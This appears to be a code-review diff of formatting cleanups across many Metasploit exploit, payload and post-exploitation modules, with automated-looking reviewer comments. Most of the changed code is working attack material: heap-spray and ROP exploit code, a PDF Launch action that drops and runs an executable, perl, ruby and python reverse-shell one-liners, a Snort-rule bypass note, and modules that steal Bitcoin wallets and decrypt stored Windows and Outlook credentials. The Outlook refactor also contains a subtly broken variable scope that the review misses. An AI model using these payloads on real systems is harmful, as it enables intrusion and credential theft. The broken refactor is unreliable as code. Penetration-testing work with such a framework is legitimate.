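Review bot: `help_html` was a bare single-line `%Q|…|` literal; as a `<<-EOS` heredoc it now ends with a newline, and because `<<-` only allows the terminator to be indented, any indentation of the `<iframe …>` line becomes part of the string (the rendered page does not preserve indentation, so this needs confirming in the file). For an iframe served to a browser the extra whitespace is almost certainly harmless, but the string is no longer byte-identical, which matters if anything measures or compares it. The same caveat applies to the other `%Q`→`<<-EOS` conversions in this commit (`content`, `html`, `js`).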
@@ -184,8 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
if mytarget['Rop']
# !mona -m msvcr71 rop
code =
[
code = [
0x7c376402, # POP EBP # RETN [msvcr71.dll]
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'mr_me <steventhomasseeley[at]gmail.com>', # metasploit module
'Dr_IDE' # original Exploit from exploit-db.com
],
],
'Version' => '$Revision$',
'References' =>
[
+32 -32
@@ -103,29 +103,29 @@ class Metasploit3 < Msf::Exploit::Remote
j_counter = rand_text_alpha(rand(30) + 2)
j_txt = rand_text_alpha(rand(8) + 4)
js = <<-EOF
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape("#{nops}");
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while(#{j_nops}.length < #{j_slackspace}) {
#{j_nops} += #{j_nops};
}
var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) {
#{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
}
js = <<-EOS
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape("#{nops}");
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while(#{j_nops}.length < #{j_slackspace}) {
#{j_nops} += #{j_nops};
}
var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) {
#{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
}
#{j_memory} = new Array();
for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ;
}
#{j_memory} = new Array();
for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ;
}
function main(){
#{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0);
}
EOF
function main(){
#{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0);
}
EOS
js = js.gsub(/^\t\t/, '')
@@ -138,17 +138,17 @@ class Metasploit3 < Msf::Exploit::Remote
main_sym = "main"
end
content = <<-EOF
<html>
<body>
<object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
<script language='javascript'>
#{js}
#{main_sym}();
</script>
</body>
</html>
EOF
content = <<-EOS
<html>
<body>
<object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
<script language='javascript'>
#{js}
#{main_sym}();
</script>
</body>
</html>
EOS
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')
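Review bot: The re-indented `js` and `content` heredocs are still post-processed with `gsub(/^\t\t/, '')`, which assumes exactly two leading tabs on every body line; the rendered page does not preserve indentation, so if the tidy pass changed the depth the strip either leaves stray tabs or removes nothing. A comment on each heredoc stating the contract, `# body is indented two tabs; the gsub below strips them`, keeps the two places in sync. Writing the `<<-` bodies at column 0 would remove the need for the post-processing altogether.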
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
# twitter.com/net__ninja
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery/msf module
'sinn3r', #Auto target, obfuscation, lots of testing
],
],
'Version' => '$Revision$',
'References' =>
[
@@ -148,30 +148,30 @@ class Metasploit3 < Msf::Exploit::Remote
main_sym = 'main' #main function name
if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
js = <<-EOF
var sc = unescape('#{sc}');
js = <<-EOS
var sc = unescape('#{sc}');
var nops = unescape('%u0c0c%u0c0c');
var offset = 20;
var s = offset + sc.length;
while(nops.length < s) {
nops += nops;
}
var chunk1 = nops.substring(0, s);
var chunk2 = nops.substring(0, nops.length - s);
while((chunk2.length + s) < 0x50000) {
chunk2 = chunk2 + chunk2 + chunk1;
}
var blocks = new Array();
for(var counter=0; counter<200; counter++){
blocks[counter] = chunk2 + sc;
}
var nops = unescape('%u0c0c%u0c0c');
var offset = 20;
var s = offset + sc.length;
while(nops.length < s) {
nops += nops;
}
var chunk1 = nops.substring(0, s);
var chunk2 = nops.substring(0, nops.length - s);
while((chunk2.length + s) < 0x50000) {
chunk2 = chunk2 + chunk2 + chunk1;
}
var blocks = new Array();
for(var counter=0; counter<200; counter++){
blocks[counter] = chunk2 + sc;
}
function main()
{
#{obj_name}.AddSeries(#{my_target.ret});
}
EOF
function main()
{
#{obj_name}.AddSeries(#{my_target.ret});
}
EOS
end
#http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
@@ -372,8 +372,9 @@ class Metasploit3 < Msf::Exploit::Remote
def create_email_body_html(body, subject)
body = body.gsub(/\\[nr]/, "<BR>\n")
body = body.gsub(/\\t/, "&nbsp;&nbsp;&nbsp;")
body = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=3D\"Content-Type\" CONTENT=3D\"text/html; charset=3Diso-8859-=\n1\">\n<TITLE>" << subject << "</TITLE>\n</HEAD>\n<BODY>\n" << body << "\n<BR><BR>\n</BODY>\n</HTML>"
return body
ret = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=3D\"Content-Type\" CONTENT=3D\"text/html; charset=3Diso-8859-=\n1\">\n"
ret << "<TITLE>" << subject << "</TITLE>\n</HEAD>\n<BODY>\n" << body << "\n<BR><BR>\n</BODY>\n</HTML>"
ret
end
def create_tnef_exploit
@@ -324,7 +324,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def make_xml(tiff_data)
xml_data = %Q|<?xml version="1.0" encoding="UTF-8" ?>
xml_data = <<-EOS
<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
@@ -383,7 +384,7 @@ class Metasploit3 < Msf::Exploit::Remote
</subform>
</form>
</xdp:xdp>
|
EOS
xml_data.gsub!(/REPLACE_TIFF/, tiff_data)
xml_data
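Review bot: With `xml_data` now a `<<-EOS` heredoc, the `<?xml version="1.0" encoding="UTF-8" ?>` declaration is only well-formed if it starts at the very beginning of the string; `<<-` keeps body indentation, so if that line is indented in the file (not visible on the rendered page) the declaration is preceded by whitespace, which strict XML parsers reject. Keeping the `<?xml` line flush left, or adding a comment `# the XML declaration must stay at column 0`, avoids that. Separately, `xml_data.gsub!(/REPLACE_TIFF/, tiff_data)` passes binary data as a String replacement, where backslash sequences such as `\1` or `\&` are interpreted; the block form `xml_data.gsub!(/REPLACE_TIFF/) { tiff_data }` inserts the bytes verbatim.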
@@ -108,8 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote
output = String.new()
output << "#{obj_num.to_i + 1} 0 obj\r<</UF(#{pdf_name}.pdf)/F(#{pdf_name}.pdf)/EF<</F #{obj_num.to_i + 2} 0 R>>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r"
output << "#{obj_num.to_i + 2} 0 obj\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>stream\r#{stream}\r\nendstream\rendobj\r"
output << "#{obj_num.to_i + 2} 0 obj\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>"
output << "stream\r#{stream}\r\nendstream\rendobj\r"
return output
end
@@ -152,7 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
xref << pdf.length
pdf << ioDef(5) << nObfu("<</Type/Action/S/Launch/Win ") << "<< "
pdf << "/F (cmd.exe) /P (/C echo Set o=CreateObject^(\"Scripting.FileSystemObject\"^):Set f=o.OpenTextFile^(\"#{file_name}\",1,True^):"
pdf << "f.SkipLine:Set w=CreateObject^(\"WScript.Shell\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\"%TEMP%\"^)+\"\\\\#{exe_name}\",2,True^):a=Split^(Trim^(Replace^(f.ReadLine,\"\\\\x\",\" \"^)^)^):"
pdf << "f.SkipLine:Set w=CreateObject^(\"WScript.Shell\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\"%TEMP%\"^)+\"\\\\#{exe_name}\",2,True^):"
pdf << "a=Split^(Trim^(Replace^(f.ReadLine,\"\\\\x\",\" \"^)^)^):"
pdf << "for each x in a:g.Write^(Chr^(\"&h\" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs"
pdf << eol << eol << eol << "#{launch_msg})"
pdf << ">>>>" << endobj
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
template = <<-EOF
template = <<-EOS
<DeepBurner_record ver="1.9.0.228" type="data">
<data_cd ver="1" device="" session2import="0" finalize_disc="0" finalize_track="1" bootable="0" boot_image_path="">
<dir name="CDRoot" imp="0">
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
<exitbutton name="ButtonExit" image_path="" image_down_path="" text="Exit" hint="Exit this program" left="120" top="96" width="75" height="25" fontname="MS Sans Serif" fontsize="8" fontcolor="255" visible="1" fontstyle="0" />
</autorun>
</DeepBurner_record>
EOF
EOS
seh_offset = 272
path = make_nops(seh_offset)
@@ -49,8 +49,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.exploit-db.com/exploits/8180' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12059/' ],
],
'Platform' => [ 'win' ],
'Payload' =>
'Platform' => [ 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
},
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
[
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
OptString.new('USERNAME', [ true, 'Username', ''])
], self.class)
@@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
[ 'x86/alpha_mixed'].each { |name|
enc = framework.encoders.create(name)
if name =~/alpha/
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
end
enc = framework.encoders.create(name)
if name =~/alpha/
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
end
hunter = enc.encode(hunter, nil, nil, platform)
}
@@ -106,5 +106,5 @@ createDataObject\('#{path_new + decoder_file + '.bat'}', unescape\(\"#{decoder}\
decoder.gsub!(/decode_stub/, "C:/Windows/Temp/" + decoder_file + '.vbs')
return decoder = Rex::Text.uri_encode(decoder)
end
end
end
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.scadatec.com/' ],
[ 'URL', 'http://www.exploit-db.com/exploits/17817/' ],
],
'Platform' => [ 'win' ],
'Payload' =>
'Platform' => [ 'win' ],
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d",
@@ -59,10 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
], self.class)
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
], self.class)
end
def exploit
+4 -3
@@ -9,11 +9,11 @@
# http://metasploit.com/framework/
##
##
=begin
# This should bypass the following snort rule referenced from web-misc.rules (10/17/2008)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;)
# Newer versions of this rule might find this but we've taken steps to atleast bypass this rule
##
=end
require 'msf/core'
@@ -94,7 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(7510),
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request",
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
], self.class)
end
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
which may result aribitrary remote code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
'Author' =>
[
# Original discovery (Secunia Research)
'Alin Rad Pop',
@@ -117,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
__END__
else if (strcmp($type, "Job") == 0)
{
@@ -166,9 +166,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending malicious packet")
open_pcap()
#handler
#handler
if datastore['LOOP']
while true
break if session_created? and datastore['ExitOnSession']
+4
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Metasploit3
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
+1
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/exec'
###
module Metasploit3
# $Revision$
include Msf::Payload::Windows::Exec
end
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/loadlibrary'
###
module Metasploit3
# $Revision$
include Msf::Payload::Windows::LoadLibrary
end
@@ -20,7 +20,7 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Java Reverse HTTPS Stager',
'Version' => '$Revision: 13402 $',
'Version' => '$Revision$',
'Description' => 'Tunnel communication over HTTPS',
'Author' => [
'mihi', # all the hard work
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
@@ -19,6 +19,7 @@ require 'msf/core/payload/osx/bundleinject'
###
module Metasploit3
# $Revision$
include Msf::Payload::Osx::BundleInject
end
@@ -21,6 +21,7 @@ require 'msf/core/payload/windows/reflectivedllinject'
###
module Metasploit3
# $Revision$
include Msf::Payload::Windows::ReflectiveDllInject
end
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/dllinject'
###
module Metasploit3
# $Revision$
include Msf::Payload::Windows::DllInject
end
+4 -4
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DNS Forward Lookup Bruteforce',
'Description' => %q{
'Description' => %q{
Brute force subdomains and hostnames via wordlist.
},
'License' => MSF_LICENSE,
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
# Run Method for when run command is issued
def run
domain = datastore['DOMAIN']
hostlst = datastore['NAMELIST']
i, a = 0, []
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Post
ns_opt = " #{n.strip}.#{domain}"
cmd = "/usr/bin/host"
end
if i <= thread_num
print_status("Trying #{ns_opt}")
a.push(::Thread.new {
@@ -126,4 +126,4 @@ class Metasploit3 < Msf::Post
end
end
end
end
end
+19 -19
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DNS Service Record Lookup Scan',
'Description' => %q{
'Description' => %q{
Enumerates know SRV Records for a given domaon using target host DNS query tool.
},
'License' => MSF_LICENSE,
@@ -42,21 +42,21 @@ class Metasploit3 < Msf::Post
# Run Method for when run command is issued
def run
srvrcd = [
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
'_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.',
'_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.',
'_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.',
'_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.',
'_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.',
'_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.',
'_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.',
'_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.',
'_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.',
'_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.',
'_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.',
'_ldap._tcp.ForestDNSZones.'
]
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
'_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.',
'_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.',
'_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.',
'_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.',
'_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.',
'_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.',
'_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.',
'_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.',
'_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.',
'_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.',
'_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.',
'_ldap._tcp.ForestDNSZones.'
]
domain = datastore['DOMAIN']
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post
ip_map[host.strip] = ip.strip
end
end
# Get SRV parameter for each record
records.each do |r|
if r =~ /svr hostname/
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Post
srv_records << rcrd
end
else
rcrd[:ip] = ip_map[rcrd[:target]]
# Report hosts found
report_host(:host => rcrd[:ip].strip, :name => rcrd[:target])
@@ -258,4 +258,4 @@ class Metasploit3 < Msf::Post
end
return srv_records
end
end
end
+3 -3
@@ -49,9 +49,9 @@ class Metasploit3 < Msf::Post
numip = ipadd.num_ips
while (iplst.length < numip)
ipa = ipadd.next_ip
if (not ipa)
break
end
if (not ipa)
break
end
iplst << ipa
end
if session.type =~ /shell/
+11 -11
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Post
[false, 'Port for Payload to connect to.', 4433]),
OptBool.new('HANDLER',
[ true, 'Start an Exploit Multi Handler to receive the connection', false]),
OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',\
'auto', ['auto','ruby','python','perl','bash']])
OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
'auto', ['auto','ruby','python','perl','bash']])
], self.class)
end
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
lport = datastore['LPORT']
cmd = ""
case datastore['type']
when /auto/i
when /auto/i
cmd = auto_create_session(lhost,lport)
when /ruby/i
cmd = ruby_session(lhost,lport)
@@ -153,8 +153,8 @@ class Metasploit3 < Msf::Post
def perl_session(lhost,lport)
if cmd_exec("perl -v") =~ /Larry/
print_status("Perl reverse shell selected")
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET \
(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " +
"(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post
def ruby_session(lhost,lport)
if cmd_exec("ruby -v") =~ /revision/i
print_status("Ruby reverse shell selected")
return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");\
while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" +
"while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -179,9 +179,9 @@ while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'
def python_session(lhost,lport)
if cmd_exec("python -V") =~ /Python 2\.(\d)/
print_status("Python reverse shell selected")
return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,\
socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);\
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," +
"socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" +
"os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -200,4 +200,4 @@ os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
end
return cmd
end
end
end
+1 -7
@@ -68,13 +68,7 @@ class Metasploit3 < Msf::Post
ip = h["return"]
h = iphlp.SendARP(ip,0,6,6)
if h["return"] == client.railgun.const("NO_ERROR")
mac = h["pMacAddr"]
mac_text = mac[0].ord.to_s(16) + ":" +
mac[1].ord.to_s(16) + ":" +
mac[2].ord.to_s(16) + ":" +
mac[3].ord.to_s(16) + ":" +
mac[4].ord.to_s(16) + ":" +
mac[5].ord.to_s(16)
mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':')
print_status("\tIP: #{ip_text} MAC #{mac_text}")
report_host(:host => ip_text,:mac => mac_text)
end
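Review bot: The new `h["pMacAddr"].unpack('C*')` formats every byte of the buffer railgun hands back, so the result is a six-octet MAC only if railgun sizes that out buffer from the 6 passed in `SendARP(ip,0,6,6)`; slicing to that length makes the assumption explicit and harmless if it already holds: `mac_text = h["pMacAddr"][0, 6].unpack('C*').map { |e| "%02x" % e }.join(':')`. The rewrite also changes what `report_host(:mac => mac_text)` stores, from the unpadded `to_s(16)` octets of the removed lines to zero-padded ones, and a one-line comment such as `# zero-padded aa:bb:cc:dd:ee:ff form; the old to_s(16) dropped leading zeros` would put that on record for anyone comparing old and new host entries. The enclosing method starts and ends outside the hunk.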
+1 -1
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post
wallet = session.fs.file.new(filename, "rb")
until wallet.eof?
data << wallet.read
end
end
store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
print_status(" Wallet Jacked.")
+1 -1
@@ -328,7 +328,7 @@ class Metasploit3 < Msf::Post
hash.unpack("H*")[0],
logonDomainName,
dnsDomainName,
last.strftime("%F %T"),
last.strftime("%F %T"),
upn,
effectiveName,
fullName,
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post
'Description' => %q{
This module will enumerate the Microsoft Credential Store and decrypt the
credentials. This module can only access credentials created by the user the
process is running as. It cannot decrypt Domain Network Passwords, but will
process is running as. It cannot decrypt Domain Network Passwords, but will
display the username and location.
},
'License' => MSF_LICENSE,
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post
end
return str_data || "Error Decrypting"
end
def decrypt_blob(daddr, dlen, type)
#type 0 = passport cred, type 1 = wininet cred
#set up entropy
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Post
def gethost(hostorip)
#check for valid ip and return if it is
return hostorip if Rex::Socket.dotted_ip?(hostorip)
return hostorip if Rex::Socket.dotted_ip?(hostorip)
#convert hostname to ip and return it
hostip = nil
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
ip_add= gethost(host)
unless ip_add.nil?
unless ip_add.nil?
auth = {
:host => ip_add,
:port => port,
@@ -185,10 +185,10 @@ class Metasploit3 < Msf::Post
#call credenumerate to get the ptr needed
adv32 = session.railgun.advapi32
ret = adv32.CredEnumerateA(nil,0,4,4)
p_to_arr = ret["Credentials"].unpack("V")
p_to_arr = ret["Credentials"].unpack("V")
arr_len = ret["Count"] * 4 if is_86
arr_len = ret["Count"] * 8 unless is_86
#tell user what's going on
print_status("#{ret["Count"]} credentials found in the Credential Store")
if ret["Count"] > 0
@@ -140,8 +140,10 @@ class Metasploit3 < Msf::Post
end
file.close
creds, perms, config = parse_server(fs_xml) # user credentials password is just an MD5 hash
# admin pass is just plain text. Priorities?
# user credentials password is just an MD5 hash
# admin pass is just plain text. Priorities?
creds, perms, config = parse_server(fs_xml)
creds.each do |cred|
credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']]
@@ -82,21 +82,27 @@ class Metasploit3 < Msf::Post
return decrypted_pw
end
# Just a wrapper to avoid copy pasta and long lines
def get_valdata(k, name)
key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
registry_getvaldata("#{key_base}\\#{k}", name)
end
def get_registry
#Determine if saved accounts exist within Outlook. Ignore the Address Book and Personal Folder registry entries.
outlook_exists = 0
saved_accounts = 0
next_account_id = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", 'NextAccountID')
next_account_id = get_valdata("", 'NextAccountID')
if next_account_id != nil
#Microsoft Outlook not found
print_status "Microsoft Outlook found in Registry..."
outlook_exists = 1
registry_enumkeys("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\").each do |k|
display_name = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name')
registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\").each do |k|
display_name = get_valdata(k, 'Display Name')
if display_name == nil
#Microsoft Outlook found, but no account data saved in this location
@@ -106,17 +112,17 @@ class Metasploit3 < Msf::Post
#Account found - parse through registry data to determine account type. Parse remaining registry data after to speed up module.
saved_accounts = 1
got_user_pw = 0
accountname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Account Name')
